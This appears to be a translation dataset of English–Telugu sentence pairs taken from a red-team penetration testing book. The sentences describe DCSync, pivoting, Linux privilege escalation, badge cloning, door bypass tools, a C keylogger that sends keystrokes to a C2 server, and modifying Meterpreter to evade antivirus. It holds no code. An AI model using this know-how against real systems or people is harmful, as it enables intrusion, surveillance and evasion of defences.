| {"en":"Generally limited to the Domain Admins, Enterprise Admins, Domain Controllers groups, and anyone with the Replicating Changes permissions set to Allow (i.e., Replicating Changes All/Replicating Directory Changes), DCSync will allow your user to perform this attack.","translation":"సాధారణంగా డొమైన్ నిర్వాహకులు, ఎంటర్ప్రైజ్ నిర్వాహకులు, డొమైన్ కంట్రోలర్ల సమూహాలకు మరియు మార్పులను ప్రతిరూపం చేయడానికి అనుమతి ఉన్న ఎవరికైనా (అంటే, అన్ని మార్పులను ప్రతిరూపం చేయడం/డైరెక్టరీ మార్పులను ప్రతిరూపం చేయడం) పరిమితం చేయబడింది, DCSync మీ వినియోగదారుని ఈ దాడిని చేయడానికి అనుమతిస్తుంది.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"This means, as long as you have permissions, you do not need to run any commands on the Domain Controller and you do not have to drop any files on the DC.","translation":"అంటే, మీకు అనుమతులు ఉన్నంత కాలం, మీరు డొమైన్ కంట్రోలర్లో ఎటువంటి ఆదేశాలను అమలు చేయనవసరం లేదు మరియు మీరు DCలో ఎటువంటి ఫైల్లను వదలవలసిన అవసరం లేదు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"To get around all of this, we sometimes need to go back to basics for lateral movement.","translation":"ఇవన్నీ అధిగమించడానికి, మనం కొన్నిసార్లు పార్శ్వ కదలిక కోసం ప్రాథమిక విషయాలకు తిరిగి వెళ్లాలి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We can take advantage of the default SSH client by using Local Port Forwarding (-L).","translation":"స్థానిక పోర్ట్ ఫార్వార్డింగ్ (-L)ని ఉపయోగించడం ద్వారా మేము డిఫాల్ట్ SSH క్లయింట్ యొక్క ప్రయోజనాన్ని పొందవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We are going to connect to our VPS over SSH using our SSH key.","translation":"మేము మా SSH కీని ఉపయోగించి SSH ద్వారా మా VPSకి కనెక్ట్ అవ్వబోతున్నాము.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Pivoting in Linux hasn't changed too much over the years.","translation":"Linuxలో పివోటింగ్ సంవత్సరాలుగా పెద్దగా మారలేదు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"In many cases, once we get either Local File Inclusion (LFI) or Remote Code Execution (RCE), we can try to privilege escalate to read the /etc/shadow file (and password crack) or we can pull some Mimikatz style trickery.","translation":"అనేక సందర్భాల్లో, మనం లోకల్ ఫైల్ ఇంక్లూజన్ (LFI) లేదా రిమోట్ కోడ్ ఎగ్జిక్యూషన్ (RCE)ని పొందిన తర్వాత, /etc/shadow ఫైల్ను (మరియు పాస్వర్డ్ క్రాక్) చదవడానికి లేదా కొన్ని మిమికాట్జ్ శైలిలో మోసగించడానికి ప్రయత్నించవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"We can use a tool called LinEnum to do all the dirty work for us.","translation":"అన్ని మురికి పనులు చేయడానికి మేము LinEnum అనే సాధనాన్ని ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"DirtyCOW is \"a race condition was found in the way Linux kernel's memory subsystem handled breakage of the read only private mappings COW situation on write access.","translation":"DirtyCOW అనేది \"Linux కెర్నల్ యొక్క మెమరీ ఉపవ్యవస్థ రీడ్ ఓన్లీ ప్రైవేట్ మ్యాపింగ్ల COW పరిస్థితిని వ్రాత యాక్సెస్పై నిర్వహించే విధానంలో రేస్ కండిషన్ కనుగొనబడింది.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"We could reset the root DB password, but that might end up breaking some of the other applications.","translation":"మనం రూట్ DB పాస్వర్డ్ను రీసెట్ చేయవచ్చు, కానీ అది ఇతర అప్లికేషన్లను విచ్ఛిన్నం చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Instead, we search for the different databases located under /var/lib/mysql and come across a cyberspacekittens database.","translation":"బదులుగా, మేము /var/lib/mysql కింద ఉన్న వివిధ డేటాబేస్ల కోసం వెతుకుతాము మరియు సైబర్స్పేస్కిటెన్స్ డేటాబేస్ను కనుగొంటాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Here, we find the secrets.ibd file that holds all the data for the secrets table.","translation":"ఇక్కడ, మేము రహస్యాల పట్టిక కోసం మొత్తం డేటాను కలిగి ఉన్న secrets.ibd ఫైల్ను కనుగొంటాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"As we read through the data, we realize that it might be encrypted...","translation":"డేటాను చదివేటప్పుడు, అది గుప్తీకరించబడి ఉండవచ్చని మేము గ్రహించాము...","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"It is up to you to figure out the rest... Congrats!!!","translation":"మిగిలిన వాటిని కనుగొనడం మీ ఇష్టం... అభినందనలు!!!","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"You have successfully compromised the Cyber Space Kittens network!","translation":"మీరు విజయవంతంగా సైబర్ స్పేస్ కిటెన్స్ నెట్వర్క్ను రాజీ పడ్డారు!","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Don't stop here... There are many things you can do with these boxes; we have only touched the surface.","translation":"ఇక్కడితో ఆగవద్దు... మీరు ఈ పెట్టెలతో చేయగలిగేవి చాలా ఉన్నాయి; మేము ఉపరితలాన్ని మాత్రమే తాకినాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Feel free to play around on these systems, find more sensitive files, figure out other ways to privilege escalate, and more.","translation":"ఈ సిస్టమ్లలో ఆడటానికి సంకోచించకండి, మరింత సున్నితమైన ఫైల్లను కనుగొనండి, అధికారాలను పెంచడానికి ఇతర మార్గాలను కనుగొనండి మరియు మరిన్ని.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"For reference, in this lab, the environment topology is represented below: Conclusion In this chapter, we went through Compromising the Network.","translation":"సూచన కోసం, ఈ ల్యాబ్లో, పర్యావరణ టోపోలాజీ క్రింద సూచించబడింది: ముగింపు ఈ అధ్యాయంలో, మేము నెట్వర్క్ను రాజీ చేయడం ద్వారా వెళ్ళాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We started either on the network with no credentials or social engineered our way to our first victim box.","translation":"మేము నెట్వర్క్లో ఎటువంటి ఆధారాలు లేకుండా ప్రారంభించాము లేదా మా మొదటి బాధితుడి పెట్టెకు సామాజికంగా ఇంజనీరింగ్ చేసాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"From there, we were able to live off the land, gain information about the network/systems, pivot around boxes, escalate privileges, and ultimately compromise the whole network.","translation":"అక్కడి నుండి, మేము భూమిపై జీవించగలిగాము, నెట్వర్క్/సిస్టమ్ల గురించి సమాచారాన్ని పొందగలిగాము, పెట్టెల చుట్టూ తిరగగలిగాము, అధికారాలను పెంచగలిగాము మరియు చివరికి మొత్తం నెట్వర్క్ను రాజీ పడగలిగాము.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"This was all accomplished with minimal scanning, using features of the network, and trying to evade all sources of detection.","translation":"ఇదంతా కనిష్ట స్కానింగ్తో, నెట్వర్క్ యొక్క లక్షణాలను ఉపయోగించి మరియు గుర్తింపు యొక్క అన్ని మూలాలను తప్పించుకోవడానికి ప్రయత్నించడం ద్వారా సాధించబడింది.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"As Red Teamers, we love social engineering (SE) attacks.","translation":"రెడ్ టీమ్గా, మేము సామాజిక ఇంజనీరింగ్ (SE) దాడులను ఇష్టపడతాము.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Not only because it can generally comprise of low skillset attacks, but because it is also easy to craft a highly trustworthy campaign at very low cost.","translation":"ఇది సాధారణంగా తక్కువ నైపుణ్యం కలిగిన దాడులతో కూడి ఉండవచ్చు కాబట్టి మాత్రమే కాదు, చాలా తక్కువ ఖర్చుతో అత్యంత నమ్మదగిన ప్రచారాన్ని రూపొందించడం కూడా సులభం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Just set up a couple of fake domains, servers, craft some emails, drop some USB sticks, and call it a day.","translation":"కొన్ని నకిలీ డొమైన్లు, సర్వర్లను సెటప్ చేయండి, కొన్ని ఇమెయిల్లను రూపొందించండి, కొన్ని USB స్టిక్లను వదలండి మరియు ఒక రోజు అని పిలవండి.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"In terms of metrics, we capture the obvious things like the number of emails sent, number of users who clicked on the link, and number of users that type in their password.","translation":"మెట్రిక్ల పరంగా, పంపిన ఇమెయిల్ల సంఖ్య, లింక్పై క్లిక్ చేసిన వినియోగదారుల సంఖ్య మరియు వారి పాస్వర్డ్ను టైప్ చేసిన వినియోగదారుల సంఖ్య వంటి స్పష్టమైన విషయాలను మేము సంగ్రహిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We also try to get creative and bring substantive value to the companies who hire us.","translation":"మేము సృజనాత్మకంగా ఉండటానికి ప్రయత్నిస్తాము మరియు మమ్మల్ని నియమించుకునే కంపెనీలకు గణనీయమైన విలువను అందిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"If you aren't familiar with this competition, these competitors have a limited amount of time to find a number of flags based on the company.","translation":"మీరు ఈ పోటీతో సుపరిచితులు కాకపోతే, ఈ పోటీదారులు కంపెనీ ఆధారంగా అనేక జెండాలను కనుగొనడానికి పరిమిత సమయాన్ని కలిగి ఉంటారు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Flags can be captured by gaining company information such as their VPN, what type of AV they use, employee-specific information, or being able to get an employee to visit a URL, and more.","translation":"వారి VPN, వారు ఉపయోగించే AV రకం, ఉద్యోగి-నిర్దిష్ట సమాచారం లేదా ఉద్యోగిని URLని సందర్శించమని పొందడం వంటి కంపెనీ సమాచారాన్ని పొందడం ద్వారా జెండాలను సంగ్రహించవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"If you want to see all the flags used in the competition, check out the 2017 competition report: http://bit.ly/2HlctvY.","translation":"మీరు పోటీలో ఉపయోగించిన అన్ని జెండాలను చూడాలనుకుంటే, 2017 పోటీ నివేదికను చూడండి: http://bit.ly/2HlctvY.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"We can identify multiple entry points and areas where we might be able to get over the fence.","translation":"మనం బహుళ ప్రవేశ మార్గాలను మరియు కంచెను దాటగలిగే ప్రాంతాలను గుర్తించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"With an initial walkthrough, we also identify some cameras, gates, entry points, and card reader systems.","translation":"మొదటి నడకతో, మేము కొన్ని కెమెరాలు, గేట్లు, ప్రవేశ మార్గాలు మరియు కార్డ్ రీడర్ సిస్టమ్లను కూడా గుర్తిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"For the most part, HID badges that don't require any public/private handshakes are still vulnerable to clone and bruteforce ID numbers.","translation":"చాలా వరకు, పబ్లిక్/ప్రైవేట్ హ్యాండ్షేక్లు అవసరం లేని HID బ్యాడ్జ్లు ఇప్పటికీ క్లోన్ చేయడానికి మరియు ID నంబర్లను బ్రూట్ఫోర్స్ చేయడానికి గురవుతాయి.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"In THP2, we loved cloning ProxCard II badges as they don't have any protections, can be cloned easily, and cards are generally purchased in bulk incrementally, which allow for easy bruteforcing.","translation":"THP2లో, మేము ProxCard II బ్యాడ్జ్లను క్లోనింగ్ చేయడాన్ని ఇష్టపడ్డాము, ఎందుకంటే వాటికి ఎటువంటి రక్షణలు లేవు, సులభంగా క్లోన్ చేయవచ్చు మరియు కార్డులను సాధారణంగా పెద్దమొత్తంలో కొనుగోలు చేస్తారు, ఇది సులభంగా బ్రూట్ఫోర్సింగ్కు వీలు కల్పిస్తుంది.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"This was all done using the Proxmark3 device.","translation":"ఇదంతా Proxmark3 పరికరాన్ని ఉపయోగించి చేయబడింది.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Since then, a much more portable version of this device has been released called Proxmark3 RDV2 Kit.","translation":"అప్పటి నుండి, ఈ పరికరం యొక్క మరింత పోర్టబుల్ వెర్షన్ Proxmark3 RDV2 కిట్ పేరుతో విడుదలైంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"This version can be configured with a battery and is much smaller than the original Proxmark3.","translation":"ఈ వెర్షన్ను బ్యాటరీతో కాన్ఫిగర్ చేయవచ్చు మరియు ఇది అసలు Proxmark3 కంటే చాలా చిన్నది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Other common cards we come across: HID iClass (13.56 MHz) HID ProxCard (125 kHz) EM4100x (125 kHz) MIFARE Classic (13.56 MHz)","translation":"మనం ఎదుర్కొనే ఇతర సాధారణ కార్డులు: HID iClass (13.56 MHz) HID ProxCard (125 kHz) EM4100x (125 kHz) MIFARE Classic (13.56 MHz)","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We won't get into physical tools and how-tos, as that is an entire book and requires a great deal of experience.","translation":"మేము భౌతిక సాధనాలు మరియు ఎలా చేయాలో చర్చించము, ఎందుకంటే అది ఒక పూర్తి పుస్తకం మరియు చాలా అనుభవం అవసరం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"As always, the best way to do physical assessments is to practice, build physical labs, and figure out what works and what doesn't.","translation":"ఎల్లప్పుడూ, భౌతిక మూల్యాంకనం చేయడానికి ఉత్తమ మార్గం ఏమిటంటే సాధన చేయడం, భౌతిక ప్రయోగశాలలను నిర్మించడం మరియు ఏమి పని చేస్తుందో మరియు ఏమి పని చేయదో తెలుసుకోవడం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Lock Picks - SouthOrd has always been our go-to for lock picks.","translation":"లాక్ పిక్స్ - సౌత్ఓర్డ్ ఎల్లప్పుడూ లాక్ పిక్స్ల కోసం మాకు ప్రధానమైనది.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Great quality and works well.","translation":"గొప్ప నాణ్యత మరియు బాగా పనిచేస్తుంది.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Gate Bypass Devices - Tool for getting around locked gates.","translation":"గేట్ బైపాస్ పరికరాలు - లాక్ చేయబడిన గేట్లను దాటడానికి సాధనం.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Shove-it Tool - Simple tool if there is adequate space been a door and the latch.","translation":"షోవ్-ఇట్ టూల్ - తలుపు మరియు లాచ్ మధ్య తగినంత స్థలం ఉంటే సాధారణ సాధనం.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Similar to the credit card swipe to open doors, you use the shove-it tool to go behind the plunger and pull back.","translation":"తలుపులు తెరవడానికి క్రెడిట్ కార్డ్ స్వైప్ చేసినట్లే, మీరు ప్లంజర్ వెనుకకు వెళ్లి లాగడానికి షోవ్-ఇట్ సాధనాన్ని ఉపయోగిస్తారు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Under the Door 2.0 – Tool for doors that have the lever handle.","translation":"డోర్ కింద 2.0 - లివర్ హ్యాండిల్ ఉన్న తలుపుల కోసం సాధనం.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"We can use the Under the Door tool to literally go under the door, wrap around the lever handle, and pull down.","translation":"డోర్ కింద ఉన్న సాధనాన్ని ఉపయోగించి, తలుపు కిందకు వెళ్లి, లివర్ హ్యాండిల్ చుట్టూ తిప్పి, క్రిందికి లాగవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Back in the day, these were commonly found in hotels, but we definitely do come across them in businesses, too.","translation":"ఒకప్పుడు, ఇవి సాధారణంగా హోటళ్లలో కనిపించేవి, కానీ మేము ఖచ్చితంగా వాటిని వ్యాపారాలలో కూడా చూస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Air Canisters - A cheap and easy tool to get around doors that unlock with motion sensors on the inside.","translation":"ఎయిర్ కానస్టర్లు - లోపల మోషన్ సెన్సార్లతో అన్లాక్ అయ్యే తలుపులను దాటడానికి చవకైన మరియు సులభమైన సాధనం.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Remember, the purpose of these tools and physical assessments is to track and monitor how a company's physical security program responds.","translation":"గుర్తుంచుకోండి, ఈ సాధనాలు మరియు భౌతిక మూల్యాంకనం యొక్క ఉద్దేశ్యం ఏమిటంటే, ఒక సంస్థ యొక్క భౌతిక భద్రతా కార్యక్రమం ఎలా స్పందిస్తుందో ట్రాక్ చేయడం మరియు పర్యవేక్షించడం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"In these cases, we like to drop keyloggers that continually run on a victim's system and send their keystrokes outbound.","translation":"ఇటువంటి సందర్భాలలో, మేము బాధితుడి సిస్టమ్లో నిరంతరం నడుస్తున్న మరియు వారి కీస్ట్రోక్లను బయటకు పంపే కీలాగర్లను వదలడానికి ఇష్టపడతాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"The reasons it is all in C are to keep the binary relatively small, have better OS control due to lower level languages, and evade AV.","translation":"అంతా సి లో ఉండటానికి కారణాలు బైనరీని సాపేక్షంగా చిన్నదిగా ఉంచడం, తక్కువ స్థాయి భాషల కారణంగా మంచి OS నియంత్రణను కలిగి ఉండటం మరియు AVని తప్పించుకోవడం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's walk through a slightly more complex example.","translation":"కొంచెం క్లిష్టమైన ఉదాహరణను పరిశీలిద్దాం.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"Setting up your environment This is the basic setup you need to write and compile in C to make Windows binaries and create the custom keylogger.","translation":"మీ వాతావరణాన్ని సెటప్ చేస్తోంది: విండోస్ బైనరీలను తయారు చేయడానికి మరియు కస్టమ్ కీలాగర్ను రూపొందించడానికి మీరు సి లో వ్రాయడానికి మరియు కంపైల్ చేయడానికి అవసరమైన ప్రాథమిక సెటప్ ఇది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Install Visual Studio so that you could use the command line compiler along with Vim for code editing","translation":"కోడ్ ఎడిటింగ్ కోసం విమ్ తో పాటు కమాండ్ లైన్ కంపైలర్ను ఉపయోగించడానికి వీలుగా విజువల్ స్టూడియోను ఇన్స్టాల్ చేయండి","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"MSDN is an invaluable resource that details system calls, type and struct definitions, and includes dozens of examples.","translation":"MSDN అనేది సిస్టమ్ కాల్లు, రకం మరియు నిర్మాణం నిర్వచనాలను వివరించే మరియు డజన్ల కొద్దీ ఉదాహరణలను కలిగి ఉన్న అమూల్యమైన వనరు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"For C, there is a good book co-authored by one of the founders of C called, The C Programming Language by Kernighan and Ritchie.","translation":"సి కోసం, కెర్నిఘన్ మరియు రిచీ రచించిన సి ప్రోగ్రామింగ్ లాంగ్వేజ్ అనే సి వ్యవస్థాపకులలో ఒకరు సహ రచయితగా మంచి పుస్తకం ఉంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Compiling from Source In these labs, there are going to be multiple code samples and examples.","translation":"సోర్స్ నుండి కంపైల్ చేస్తోంది: ఈ ల్యాబ్లలో, బహుళ కోడ్ నమూనాలు మరియు ఉదాహరణలు ఉండబోతున్నాయి.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"The compiler defaults to 32-bit, but this code can also be compiled in 64-bit.","translation":"కంపైలర్ 32-బిట్కు డిఫాల్ట్ అవుతుంది, కానీ ఈ కోడ్ను 64-బిట్లో కూడా కంపైల్ చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"The goal of this project is to create a keylogger that utilizes C and low-level Windows functions to monitor keystrokes.","translation":"ఈ ప్రాజెక్ట్ యొక్క లక్ష్యం ఏమిటంటే, కీస్ట్రోక్లను పర్యవేక్షించడానికి సి మరియు లో-లెవెల్ విండోస్ ఫంక్షన్లను ఉపయోగించుకునే కీలాగర్ను రూపొందించడం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"This keylogger makes use of the SetWindowsHookEx and LowLevelKeyboardProc functions.","translation":"ఈ కీలాగర్ SetWindowsHookEx మరియు LowLevelKeyboardProc ఫంక్షన్లను ఉపయోగిస్తుంది.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"The function prototype for SetWindowsHookEx looks like this:","translation":"SetWindowsHookEx కోసం ఫంక్షన్ ప్రోటోటైప్ ఇలా కనిపిస్తుంది:","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"The hook ID is an integer for the type of hook that you are going to install.","translation":"మీరు ఇన్స్టాల్ చేయబోయే హుక్ రకం కోసం హుక్ ID ఒక పూర్ణాంకం.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"This is the function that will be used to write the keystrokes to the file.","translation":"కీస్ట్రోక్లను ఫైల్కు వ్రాయడానికి ఉపయోగించే ఫంక్షన్ ఇది.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"The callback function will do the heavy lifting for this program.","translation":"కాల్బ్యాక్ ఫంక్షన్ ఈ ప్రోగ్రామ్ కోసం భారీ లిఫ్టింగ్ చేస్తుంది.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"The value of the lParam KBDLLHOOKSTRUCT is the vkCode or Virtual Key Code.","translation":"lParam KBDLLHOOKSTRUCT యొక్క విలువ vkCode లేదా వర్చువల్ కీ కోడ్.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"The command prompt problem can be fixed relatively easily by switching the standard C “Main” function entry point with the Windows specific WinMain function entry point.","translation":"ప్రామాణిక సి “మెయిన్” ఫంక్షన్ ఎంట్రీ పాయింట్ను విండోస్ నిర్దిష్ట విన్మెయిన్ ఫంక్షన్ ఎంట్రీ పాయింట్తో మార్చడం ద్వారా కమాండ్ ప్రాంప్ట్ సమస్యను సాపేక్షంగా సులభంగా పరిష్కరించవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"The network side of the program will be straightforward.","translation":"ప్రోగ్రామ్ యొక్క నెట్వర్క్ వైపు నేరుగా ఉంటుంది.","target_lang":"te","domain":"technical","complexity":"simple"} | |
| {"en":"For our example, the code will use AF_UNSPEC for IPV4 and SOC_STREAM for TCP connectivity, and use the getaddrinfo function to fill out the c2 struct using the previous wants.","translation":"మా ఉదాహరణ కోసం, కోడ్ IPV4 కోసం AF_UNSPECని మరియు TCP కనెక్టివిటీ కోసం SOC_STREAMని ఉపయోగిస్తుంది మరియు మునుపటి కోరికలను ఉపయోగించి c2 నిర్మాణంను పూరించడానికి getaddrinfo ఫంక్షన్ను ఉపయోగిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Once the listener is started and the keylogger is running, you should see all the commands from the victim host pushed to the C2 server every 10 minutes.","translation":"శ్రోత ప్రారంభమైన తర్వాత మరియు కీలాగర్ నడుస్తున్నప్పుడు, బాధితుడి హోస్ట్ నుండి వచ్చే అన్ని ఆదేశాలు ప్రతి 10 నిమిషాలకు C2 సర్వర్కు నెట్టబడాలి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"You would want to create your own send and recv wrappers, which decrypt/encrypt before calling the send and recv functions.","translation":"మీరు మీ స్వంత పంపండి మరియు స్వీకరించండి కవచాలను సృష్టించాలనుకుంటున్నారు, ఇవి పంపండి మరియు స్వీకరించండి ఫంక్షన్లను పిలవడానికి ముందు డీక్రిప్ట్/ఎన్క్రిప్ట్ చేస్తాయి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"An extremely easy way to do this would be to use a multi byte XOR key, which while not very secure, would at least change your messages enough to not be easily identifiable.","translation":"దీన్ని చేయడానికి చాలా సులభమైన మార్గం ఏమిటంటే, బహుళ బైట్ XOR కీని ఉపయోగించడం, ఇది చాలా సురక్షితం కానప్పటికీ, కనీసం మీ సందేశాలను సులభంగా గుర్తించకుండా మార్చడానికి సరిపోతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Another exercise could be to extend the LoadBlobHandler() function to have a new LOAD_TYPE, which would load a signed driver if the client is being run as administrator.","translation":"మరొక వ్యాయామం ఏమిటంటే, అడ్మినిస్ట్రేటర్గా క్లయింట్ రన్ అవుతున్నట్లయితే, సంతకం చేసిన డ్రైవర్ను లోడ్ చేసే కొత్త LOAD_TYPEని కలిగి ఉండటానికి LoadBlobHandler() ఫంక్షన్ను విస్తరించడం.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Be aware that this is going to be a little more advanced and you will most likely run into some issues during compile time.","translation":"ఇది కొంచెం అధునాతనంగా ఉంటుందని తెలుసుకోండి మరియు మీరు కంపైల్ సమయంలో కొన్ని సమస్యలను ఎదుర్కొనే అవకాశం ఉంది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"There are plenty of great tools like Metasploit/Meterpreter out there, but every antivirus and network intrusion detection (NID) tool has developed signatures for it.","translation":"మెటాస్ప్లోయిట్/మీటర్ప్రెటర్ వంటి గొప్ప సాధనాలు చాలా ఉన్నాయి, కానీ ప్రతి యాంటీవైరస్ మరియు నెట్వర్క్ చొరబాటు గుర్తింపు (NID) సాధనం దాని కోసం సంతకాలను అభివృద్ధి చేసింది.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"We can try to obfuscate payloads with Shikata Ga Nai and go over HTTPS, but that only goes so far.","translation":"మేము షికాటా గా నైతో పేలోడ్లను అస్పష్టం చేయడానికి ప్రయత్నించవచ్చు మరియు HTTPS ద్వారా వెళ్ళవచ్చు, కానీ అది చాలా దూరం వెళ్ళదు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Any type of obfuscation will generally have a stub signature to detect off of, AV will look into memory for certain strings in certain locations, and networks perform man-in-the-middle inspection over HTTPS.","translation":"ఏదైనా రకమైన అస్పష్టత సాధారణంగా గుర్తించడానికి ఒక స్టబ్ సిగ్నేచర్ను కలిగి ఉంటుంది, AV నిర్దిష్ట స్థానాల్లో నిర్దిష్ట స్ట్రింగ్ల కోసం మెమరీని పరిశీలిస్తుంది మరియు నెట్వర్క్లు HTTPS ద్వారా మధ్యలో ఉన్న వ్యక్తి తనిఖీని నిర్వహిస్తాయి.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"So how can we do to keep using our favorite tools, while getting around all the common protections?","translation":"కాబట్టి సాధారణ రక్షణలన్నింటినీ దాటవేస్తూ, మనకు ఇష్టమైన సాధనాలను ఎలా ఉపయోగించవచ్చు?","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Let's take the example of Metasploit/Meterpreter and see how we can bypass all these hurdles.","translation":"మెటాస్ప్లోయిట్/మీటర్ప్రెటర్ ఉదాహరణను తీసుకుందాం మరియు ఈ అడ్డంకులన్నింటినీ ఎలా దాటవచ్చో చూద్దాం.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Our goals are to get around AV signatures on the binary, AV signatures in memory, and network signatures.","translation":"బైనరీపై AV సంతకాలను, మెమరీలోని AV సంతకాలను మరియు నెట్వర్క్ సంతకాలను దాటవేయడమే మా లక్ష్యాలు.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"First, we need to modify the Meterpreter payloads to make sure they aren't easily detected with signatures both on the network and in memory.","translation":"ముందుగా, నెట్వర్క్లో మరియు మెమరీలో సంతకాలతో అవి సులభంగా గుర్తించబడకుండా చూసుకోవడానికి మేము మీటర్ప్రెటర్ పేలోడ్లను సవరించాలి.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Second, we modify the metsvc persistence module to prevent it from flagging anti-virus.","translation":"రెండవది, యాంటీవైరస్ను ఫ్లాగ్ చేయకుండా నిరోధించడానికి మేము మెట్ఎస్విసి పట్టుదల మాడ్యూల్ను సవరిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
| {"en":"Third, we compile portions of metsrv (the actual Meterpreter payload) with Clang, to prevent it also from flagging anti-virus signatures.","translation":"మూడవది, యాంటీవైరస్ సంతకాలను ఫ్లాగ్ చేయకుండా నిరోధించడానికి మేము క్లాంగ్తో మెట్సర్వ్ (నిజమైన మీటర్ప్రెటర్ పేలోడ్) భాగాలను కంపైల్ చేస్తాము.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Last, we will write our own stage0 payload, which downloads and executes Meterpreter, to bypass all anti-virus.","translation":"చివరగా, మేము మా స్వంత స్టేజ్0 పేలోడ్ను వ్రాస్తాము, ఇది మీటర్ప్రెటర్ను డౌన్లోడ్ చేసి అమలు చేస్తుంది, అన్ని యాంటీవైరస్లను దాటవేయడానికి.","target_lang":"te","domain":"technical","complexity":"complex"} | |
| {"en":"Many network products detect the stage 0/1/2 loaders of Meterpreter as they go across the wire.","translation":"మీటర్ప్రెటర్ యొక్క స్టేజ్ 0/1/2 లోడర్లను వైర్ ద్వారా వెళ్ళేటప్పుడు చాలా నెట్వర్క్ ఉత్పత్తులు గుర్తిస్తాయి.","target_lang":"te","domain":"technical","complexity":"moderate"} | |
